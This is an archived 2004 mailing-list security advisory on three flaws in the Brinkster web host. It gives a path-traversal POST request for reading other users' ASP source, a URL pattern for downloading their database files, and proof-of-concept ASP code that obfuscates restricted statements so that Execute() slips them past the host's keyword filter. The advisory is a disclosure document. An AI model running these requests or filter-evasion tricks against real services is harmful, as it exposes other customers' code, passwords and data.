lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 8 Feb 2004 23:10:10 +0200
From: "Ferruh Mavituna" <ferruh@...ituna.com>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>,
   "'Secunia'" <vuln@...unia.com>, "'Vulnwatch'" <vulnwatch@...nwatch.org>,
   <webappsec@...urityfocus.com>,
   "Windows NTBugtraq Mailing List" <NTBUGTRAQ@...TSERV.NTBUGTRAQ.COM>
Subject: Brinskter Multiple Vulnerabilities


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------
BRINSKTER MULTIPLE VULNERABILITIES
- ------------------------------------------------------
Online URL : http://ferruh.mavituna.com/?435

1. Retrieving other users ASP Source Codes
Severity: Highly Critical

2. Accessing Database Files
Severity: Medium Critical

3. Skipping Brinkster Code Controls
Severity: Low Critical


- ------------------------------------------------------
ABOUT BRINKSTER;
- ------------------------------------------------------
Brinkster is a popular free and paid Windows based web hosting
company with many customers 
www.brinskter.com

- ------------------------------------------------------
VULNURABLE;
- ------------------------------------------------------
Currently (1/26/2004) Brinskter.com is vulnerable;

- ------------------------------------------------------
1.RETRIEVING OTHER USERS ASP SOURCE CODES
- ------------------------------------------------------
Any valid user can access other users source codes just by know file
names. So an attacker can access ASP Source Codes, database passwords
and other information in source codes.

This problem is related with Brinkster File Manager
(http://www.brinkster.com/FileManager.asp). File Manager Edit page
(http://www.brinkster.com/FileManagerEdit.asp) allows an attacker to
access other user's files by modifying POST requests.

	------------------------------------------------------
	URL	: http://www.brinkster.com/FileManagerEdit.asp
	POST	: faction=editfile&file2edit=%5C..%5C[VICTIM
USERNAME]%5C[FILE
TO READ AS TEXT]
	------------------------------------------------------

- ------------------------------------------------------
2. ACCESSING DATABASE FILES
- ------------------------------------------------------
If you know the name of any Brinkster user database file you can
download it. (You can find database name form source code -see:first
vuln.-). 

	------------------------------------------------------
	Database URL;

http://[BrinksterServer].brinkster.com/[Username]/db/[DatabaseFileName
]
	------------------------------------------------------


- ------------------------------------------------------
3. SKIPPING CODE CONTROLS
- ------------------------------------------------------
Brinkster does not allow some code snippets in ASP files for server
performance. Like "Server.Scripttimeout = 8000". Brinkster File
Manager automatically scanning your uploaded source code and if it
find any restricted keyword, it will delete your uploaded file.

You can skip this by using ASP built-in Execute() function. This
function is not in Brinkster keyword blacklist. So write a simple
decoder and encoder for your code and use it by Execute() function.


	------------------------------------------------------
	Proof of Concept;
	------------------------------------------------------	
	1) Simple Method without Execute();
	<%
	 On _
	 Error Resume Next
	%>

	2) Another Method with Execute();
	<%
	Dim onErrorStr
	onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s
u m e-N e x t"
	Execute(Replace(Replace(onErrorStr," ",""),"-"," "))
	%>


	3) Another one with a Ascii values and Execute();
	This code allows you set "Server.Scripttimeout";
	<%
	Dim converted
	Const errStr =
"083101114118101114046083099114105112116084105109101111117116032061032
057048048048048048048048048 "
		converted = Asc2Str(errStr)
		Execute(converted)

		Response.Write converted	

		Function Asc2Str(byVal text)
			Dim converted, character, i
			For i = 0 to Round((Len(text)-1)/3,0)
				If Len(text) > 2 Then
					character = Chr(Left(text,3))
					converted = converted & character
					text = Right(text,Len(text)-3)
				End If
			Next

			Asc2Str = converted
		End Function
	%>
	------------------------------------------------------
	// -- 
	------------------------------------------------------



- ------------------------------------------------------
HISTORY;
- ------------------------------------------------------
01.01.2004 - Discovered
01.18.2004 - Vendor Informed
02.08.2004 - Published

- ------------------------------------------------------
Vendor Status;
- ------------------------------------------------------
2 e-mails, any answer.


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.3

iQA/AwUBQCaloDL0QoVzo2STEQLb/ACggW0TpBAbt4q+g+ejzLJ68PhGK9gAnA8L
d4nBCqCN6a2YpLYyycS1klqd
=jBvy
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ